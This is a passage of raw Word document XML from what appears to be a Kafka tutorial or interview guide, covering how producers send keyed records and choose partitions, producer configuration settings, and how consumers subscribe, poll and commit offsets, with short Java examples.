          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entry point of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCDBB8"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has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valu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timestamp</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optional headers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711623EB"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can </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>choose the partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or let Kafka determine it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CEBDF"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3E8EBD">
          <v:rect id="_x0000_i3334" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1D3C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Producer Sends Messages?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7547612C"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 prepares a message</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (called ProducerRecord):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E67BEEF"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orders", "order-123", "Item A");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D14AAAA"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orders" = topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE445C7"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123" = key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55AD3E"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tem A" = value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE42E70"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Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance sends the record:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D675E6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75D217"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goes through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609BEE1"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECA7C4"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ing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ECBE80"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Batching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50552C76"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mpression (if configured)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E977D5C"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t over the network to Kafka broker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B1321A"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6B742">
          <v:rect id="_x0000_i3335" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDBD6B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artitioning Logic in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C88743"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topics are split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xml:space="preserve"> to allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism and scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFA074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Kafka determines the partition using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F71FD0"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provided</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C5EA8"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artition = hash(key) % number_of_partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381822AE"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nsures all records with the same key go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → preserves order per key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F74A46"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NOT provided</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E929D5" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ound-robin strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across available partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F6B862"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14D92">
          <v:rect id="_x0000_i3336" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C3F9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2293"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="31AA0B4E" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34EFB82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 Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B799084"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out Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="3BDA6E8E" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63808E6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 preserved per key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55E48BF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o order guarantee</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="55A44B1D" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45CFFFAC"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Enables grouping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57904B4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ata scattered randomly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="42AAD793" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AE2887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lps in consistent hashing → efficient processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F9999B6" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F1CF1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69B7C6">
          <v:rect id="_x0000_i3337" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04567B99"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D053F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logins", "user123", "login at 10AM");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47319A6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f topic user-logins has 3 partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCFDF7" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129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ash of "user123" will determine which of the 3 partitions the message goes to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7CE7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C09B0">
          <v:rect id="_x0000_i3338" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A77322"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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809"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="356A7FA3" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AF8AE07"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713911B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4A68724F" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51AF735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ootstrap.servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52E8DC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broker list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="03AFD45E" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F617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ey.serializer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32DDD7E2"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key (e.g., StringSerializer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="2CB59629" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B72D6C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value.serializer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FA5F5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value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="2921B4B8" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4E787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5670315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durability (0, 1, all)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="77A29962" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D1EAF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D47D42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umber of retries if send fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="689BF5F1" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E32DE0"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2D63CC2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elay to allow batching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="5BB2CDB6" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42370F7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55593E2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 size in bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="758AB4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C67DA">
          <v:rect id="_x0000_i3339" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="652871F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p w14:paraId="5BA9D8D7"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producer </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sends data to topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF09975"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divided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323BDFD1"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eys</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> help decide </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>which partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data goes to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E062540"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per partitioning = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order</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load balancing</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efficient consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCFD74E" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00CE4B95"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3340" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BCB6C" w14:textId="2A220D2C"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827" w:name="_Toc197868041"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka consumer, and how does it consume messages?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="827"/>
    </w:p>
    <w:p w14:paraId="483B90BB" w14:textId="5533AB83" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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Consumer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C357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Consum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reads (consumes)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data from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2B0C06C6"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t </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribes to one or more topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076CAD07"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 xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pulls messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Kafka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6F36A9E0"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work in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable and fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FE964"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946C9F">
          <v:rect id="_x0000_i3341" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26497447"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Consumer Consume Messages?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFE7E3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re’s the step-by-step working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403BF2B2"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ubscribe to a topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA68DC"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Collections.singletonList("orders"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5A3B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 the messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196EE5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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641417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ConsumerRecords&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(100));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30783F61"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for (ConsumerRecord&lt;String, String&gt; record : records) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10242FFA"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record.key() + " =&gt; " + record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57514516"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63D450D4"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32DCE2C"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broker returns messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from assigned partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B632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w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deserialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A286C1F"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commits offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to track what has been read.</w:t>
      </w:r>
